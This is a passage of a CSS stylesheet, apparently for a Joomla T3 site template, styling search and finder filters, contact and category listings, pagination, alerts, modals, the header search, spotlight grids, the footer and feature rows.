  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  display: table;
  content: " ";
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
div.finder .input-group {
  display: flex;
}
div.finder .input-group input {
  flex: 1;
}
div.finder .com-finder__tips {
  margin-top: 20px;
}
#finder-filter-window {
  margin-top: 20px;
}
#finder-filter-window #finder-filter-select-dates {
  display: grid;
  grid-template-columns: 1fr;
  gap: 10px;
  margin-bottom: 40px;
}
@media screen and (min-width: 1200px) {
  #finder-filter-window #finder-filter-select-dates {
    grid-template-columns: repeat(2, 1fr);
  }
}
#finder-filter-window #finder-filter-select-dates .filter-date {
  display: flex;
  flex-wrap: wrap;
  padding: 0;
  gap: 10px;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date label {
  flex-basis: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date select.inputbox {
  margin: 0;
  width: 100% !important;
  max-width: unset;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar {
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar .form-control {
  flex: 1;
  max-width: unset;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .chzn-container {
  margin-bottom: 6px;
}
#finder-filter-window #finder-filter-select-dates .filter-date br {
  display: none;
}
#finder-filter-window .filter-branch {
  display: flex;
  flex-wrap: wrap;
  flex-direction: column;
  gap: 10px;
  width: 100%;
}
@media (min-width: 1200px) {
  #finder-filter-window .filter-branch {
    flex-direction: row;
  }
}
#finder-filter-window .filter-branch .control-label {
  padding: 0;
  margin-bottom: 10px;
}
#finder-filter-window .filter-branch .controls {
  margin-left: 0;
}
#finder-filter-window .filter-branch .controls select {
  color: #9e9e9e;
  width: 100%;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .thumbnail {
  padding: 4px;
}
.contact dd::after {
  display: none;
}
.contact .icon-address::before {
  content: '\f02d';
}
.contact .icon-fax::before {
  content: '\f109';
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.contact-category ul.category {
  border-top: 0;
  overflow: hidden;
}
.contact-category ul.category li.row-fluid {
  border: 1px solid #eeeeee;
  width: 100%;
  margin-right: 0;
  margin-left: 0;
}
.contact-category ul.category li.row-fluid:before,
.contact-category ul.category li.row-fluid:after {
  display: table;
  content: " ";
}
.contact-category ul.category li.row-fluid:after {
  clear: both;
}
.contact-category ul.category li.row-fluid > div {
  margin: 0;
}
.contact-category .cat-children ul {
  border: 0;
  border-top: 1px solid #eeeeee;
}
.contact-category .cat-children ul li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 5px 0 5px 0;
}
.contact-category .cat-children ul li h4 {
  border-left: 1px dotted #999999;
  font-size: 14px;
  font-weight: 600;
  padding: 0;
  padding-left: 15px;
  margin-left: 20px;
  position: relative;
}
.contact-category .cat-children ul li h4:after {
  border-top: 1px dotted #999999;
  display: block;
  content: "";
  position: absolute;
  left: 0;
  top: 8px;
  height: 1px;
  width: 10px;
}
.contact-category .cat-children ul li li h4 {
  margin-left: 40px;
}
.contact-category .cat-children ul li li li h4 {
  margin-left: 60px;
}
.contact-category .cat-children ul li li li li h4 {
  margin-left: 80px;
}
.contact-category .cat-children ul li:last-child {
  border: 0;
}
.category-item:before,
.category-item:after {
  display: table;
  content: " ";
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 40px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  display: table;
  content: " ";
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #ff8800;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #ff8800;
  color: #ffffff;
}
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;
}
.pagenavigation ul.pagination > li,
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenavigation ul.pagination > li.pagenav-prev,
.pagenav > li.pagenav-prev,
.pagenavigation ul.pagination > li.previous,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenavigation ul.pagination > li.pagenav-next,
.pagenav > li.pagenav-next,
.pagenavigation ul.pagination > li.next,
.pagenav > li.next {
  margin-left: auto;
}
.pagenavigation ul.pagination li > a,
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0;
}
.pagenavigation ul.pagination li > a:hover,
.pagenav li > a:hover,
.pagenavigation ul.pagination li > a:active,
.pagenav li > a:active,
.pagenavigation ul.pagination li > a:focus,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  display: table;
  content: " ";
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #b35f00;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}
.js-stools-container-filters .js-stools-field-filter .chzn-single,
.js-stools-container-filters .js-stools-field-filter .chzn-drop {
  border-radius: 0;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn {
  width: auto !important;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn ul li input {
  width: 208px !important;
  height: 24px !important;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-left: 20px;
}
#glossary-detail .modal-dialog {
  height: 100vh;
  position: relative;
}
#glossary-detail .modal-content {
  padding: 24px;
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
}
#glossary-detail .modal-content .modal-header {
  flex-direction: row-reverse;
  justify-content: space-between;
  padding: 0 0 24px;
}
#glossary-detail .modal-content .modal-header::after,
#glossary-detail .modal-content .modal-header::before {
  display: none;
}
#glossary-detail .modal-content .modal-header .close {
  padding: 6px 10px;
  background-color: #005788;
  color: #fff;
  opacity: 1;
  transition: all 0.3s ease-in-out;
}
#glossary-detail .modal-content .modal-header .close:hover {
  opacity: .7;
}
#glossary-detail .modal-content .modal-body {
  margin-top: 24px;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  display: table;
  content: " ";
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  display: table;
  content: " ";
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #ff8800;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #ffffff;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  display: table;
  content: " ";
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 991px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
.label {
  border-radius: 0;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #ffe7cc;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
.modal-body iframe {
  width: 100%;
  max-height: none;
  border: 0 !important;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #e67a00;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #e67a00;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #e67a00;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #ff8800;
  border-left: 1px solid #e67a00;
  border-right: 1px solid #e67a00;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #e67a00;
  }
}
.head-search .search .fa-search {
  color: #ffffff;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #ffffff;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.head-search .mod-finder input {
  z-index: 10;
}
.head-search .mod-finder > .awesomplete {
  position: relative;
}
.head-search .mod-finder > .awesomplete::after {
  content: '\f002';
  color: #bbe6ff;
  display: inline-block;
  font-family: "FontAwesome";
  height: 16px;
  width: 16px;
  position: absolute;
  top: 19px;
  margin-left: 20px;
}
.head-search .mod-finder .mod-finder__search input {
  width: 100px;
  padding: 10px 15px;
}
@media screen and (max-width: 576px) {
  .head-search .mod-finder .mod-finder__search input {
    width: 50px;
  }
}
.head-search .mod-finder .mod-finder__search input:focus {
  width: 200px;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 20px;
    top: 0;
    max-width: none;
  }
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-spotlight {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
@media screen and (max-width: 767px) {
  .t3-spotlight > div {
    margin-bottom: 20px;
  }
}
@media screen and (min-width: 992px) {
  .t3-spotlight:not(:root:root) .col-md-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-md-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-md-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-md-12 {
    width: 100%;
  }
}
@media screen and (max-width: 991px) {
  .t3-spotlight:not(:root:root) .col-sm-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-sm-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-sm-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-sm-12 {
    width: 100%;
  }
}
@media screen and (max-width: 767px) {
  .t3-spotlight:not(:root:root) .col-xs-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-xs-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-xs-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-xs-12 {
    width: 100%;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (max-width: 767px) {
  .t3-sl {
    padding-bottom: 20px;
    padding-top: 20px;
  }
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  display: table;
  content: " ";
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  display: table;
  content: " ";
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-left: 0;
  margin-bottom: 0;
  padding-left: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  right: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  display: table;
  content: " ";
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  display: table;
  content: " ";
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: right;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #ff8800;
  color: #ffffff;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #ffffff;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #cc6d00;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
